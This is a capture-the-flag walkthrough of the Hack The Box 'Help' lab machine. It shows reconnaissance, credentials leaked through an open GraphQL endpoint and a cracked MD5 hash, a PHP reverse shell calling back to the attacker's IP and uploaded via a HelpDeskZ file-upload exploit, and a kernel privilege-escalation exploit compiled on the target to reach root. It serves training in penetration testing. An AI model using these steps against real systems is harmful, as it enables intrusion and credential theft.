HTB Help done
Help
OS:
Linux
Notes
HelpDeskZ 1.0.2 - Arbitrary File Upload --> https://www.exploit-db.com/exploits/40300
From: http://help.htb:3000/
Username: Shiv
Technology:
GraphQL
HelpDeskZ 1.0.2
Express framework
IP Address:
10.10.10.121
Open ports:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18
3000/tcp open http Node.js Express framework
Users and pass:
From http://help.htb:3000/graphql
L: [email protected]
P: godhelpmeplz
---
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.10.121_nmap 10.10.10.121 ; cat 10.10.10.121_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-04 22:57 CEST
Nmap scan report for 10.10.10.121
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://help.htb/
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ cat /etc/hosts | grep help
10.10.10.121 help.htb
Open website: http://help.htb/
Default website - Apache, nothing interesting here
Ffuz - http://help.htb
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ ffuf -u http://help.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -o help.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://help.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : help.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 33ms]
javascript [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 34ms]
support [Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 33ms]
:: Progress: [122814/122814] :: Job [1/1] :: 1183 req/sec :: Duration: [0:02:00] :: Errors: 0 ::
Ffuz - http://help.htb:3000
ffuf -u http://help.htb:3000/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -o help.htb_3000_ffuz -of all -e .php,.html,.txt,.bac,.backup
Open website: http://help.htb:3000
First check Response Headers, we found X-Powered-By Express
__
Content-Length 81
Content-Type application/json; charset=utf-8
Date Mon, 05 Aug 2024 22:59:05 GMT
ETag W/"51-gr8XZ5dnsfHNaB2KgX/Gxm9yVZU"
X-Powered-By Express
---
After googling I confirm that it may be Grafana
https://graphql.org/graphql-js/running-an-express-graphql-server/
Get creds via Graphql
Sent request
[GraphQL - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql#querying)
Run request from curl
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ curl -s -G http://help.htb:3000/graphql -H "Content-Type: application/json" --data-urlencode "query={user{username,password}}" | jq
{
"data": {
"user": {
"username": "[email protected]",
"password": "5d3c93182bb20f07b994a7f617e99cff"
}
}
}
Encode password - MD5
Cracked hash: godhelpmeplz
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------
HASH: 5d3c93182bb20f07b994a7f617e99cff
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
---
Crack hash md5
___
5d3c93182bb20f07b994a7f617e99cff --> godhelpmeplz
Login to PA: http://help.htb/support/
L: [email protected]
P: godhelpmeplz
---
http://help.htb/support/?v=view_tickets
Exploit: HelpDeskZ 1.0.2 - Arbitrary File Upload
[HelpDeskZ 1.0.2 - Arbitrary File Upload](https://www.exploit-db.com/exploits/40300)
Upload revshell
Revshell
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ cat revshell.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.25/80 0>&1'");
?>
---
http://help.htb/support/?v=submit_ticket&action=displayForm
Upload revshell via "Submit a Ticket"
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ wget https://www.exploit-db.com/download/40300
--2024-08-27 20:39:23-- https://www.exploit-db.com/download/40300
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4384 (4.3K) [application/txt]
Saving to: ‘40300’
40300 100%[==============================================>] 4.28K --.-KB/s in 0s
2024-08-27 20:39:24 (191 MB/s) - ‘40300’ saved [4384/4384]
Run exploit
Start netcat
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.121] 43068
bash: cannot set terminal process group (747): Inappropriate ioctl for device
bash: no job control in this shell
help@help:/var/www/html/support/uploads/tickets$ id
id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
---
Start revshell
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ python2 40300 http://help.htb/support/uploads/tickets/ revshell.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
Read flag: user.txt
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.121] 43068
bash: cannot set terminal process group (747): Inappropriate ioctl for device
bash: no job control in this shell
help@help:/var/www/html/support/uploads/tickets$ id
id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
help@help:/var/www/html/support/uploads/tickets$
help@help:/var/www/html/support/uploads/tickets$ find / -name "user.txt" 2>/dev/null
<port/uploads/tickets$ find / -name "user.txt" 2>/dev/null
/home/help/user.txt
help@help:/var/www/html/support/uploads/tickets$ cd /home/help
cd /home/help
help@help:/home/help$
help@help:/home/help$ ls -a
ls -a
.
..
.bash_history
.bash_logout
.bash_profile
.bashrc
.cache
.forever
.nano
.npm
.profile
help
npm-debug.log
user.txt
help@help:/home/help$
help@help:/home/help$ cat user.txt ; id ; ip a
cat user.txt ; id ; ip a
74b1d7f96b6f55a3e1790168e9268d1a
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:00:3f:be:02 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fec0::5054:ff:fe3f:be02/64 scope site mngtmpaddr dynamic
valid_lft 86079sec preferred_lft 14079sec
inet6 fe80::5054:ff:fe3f:be02/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 52:54:00:3f:be:02 brd ff:ff:ff:ff:ff:ff
help@help:/home/help$
Privilege Escalation
Check version kernel
uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
help@help:/home/help$
Exploit: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
[Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation](https://www.exploit-db.com/exploits/44298)
Start python webserver
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Help]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.121 - - [27/Aug/2024 22:13:07] "GET /44298 HTTP/1.1" 200 -
Upload exploit to remote host
help@help:/home/help$ wget http://10.10.14.25:8000/44298
wget http://10.10.14.25:8000/44298
--2024-08-27 15:13:07-- http://10.10.14.25:8000/44298
Connecting to 10.10.14.25:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6021 (5.9K) [application/octet-stream]
Saving to: '44298'
0K ..... 100% 3.03M=0.002s
2024-08-27 15:13:07 (3.03 MB/s) - '44298' saved [6021/6021]
Compile and run exploit
help@help:/home/help$ mv 44298 44298.c
mv 44298 44298.c
help@help:/home/help$
help@help:/home/help$ gcc 44298.c -o exploit_kernel
gcc 44298.c -o exploit_kernel
help@help:/home/help$
help@help:/home/help$ chmod a+x exploit_kernel
chmod a+x exploit_kernel
help@help:/home/help$
help@help:/home/help$ ./exploit_kernel
./exploit_kernel
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
Read flag: root.txt
cd /root/
ls -a
.
..
.bash_history
.bashrc
.cache
.forever
.nano
.npm
.profile
root.txt
snap
type root.txt ; id ; ip a
/bin/bash: line 7: type: root.txt: not found
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:00:3f:be:02 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fec0::5054:ff:fe3f:be02/64 scope site mngtmpaddr dynamic
valid_lft 85972sec preferred_lft 13972sec
inet6 fe80::5054:ff:fe3f:be02/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 52:54:00:3f:be:02 brd ff:ff:ff:ff:ff:ff
cat root.txt
2655c5def2552225a175dd5c301848f0
References
[GraphQL - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql#querying)
[HelpDeskZ 1.0.2 - Arbitrary File Upload](https://www.exploit-db.com/exploits/40300)
[Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation](https://www.exploit-db.com/exploits/44298)
Lessons Learned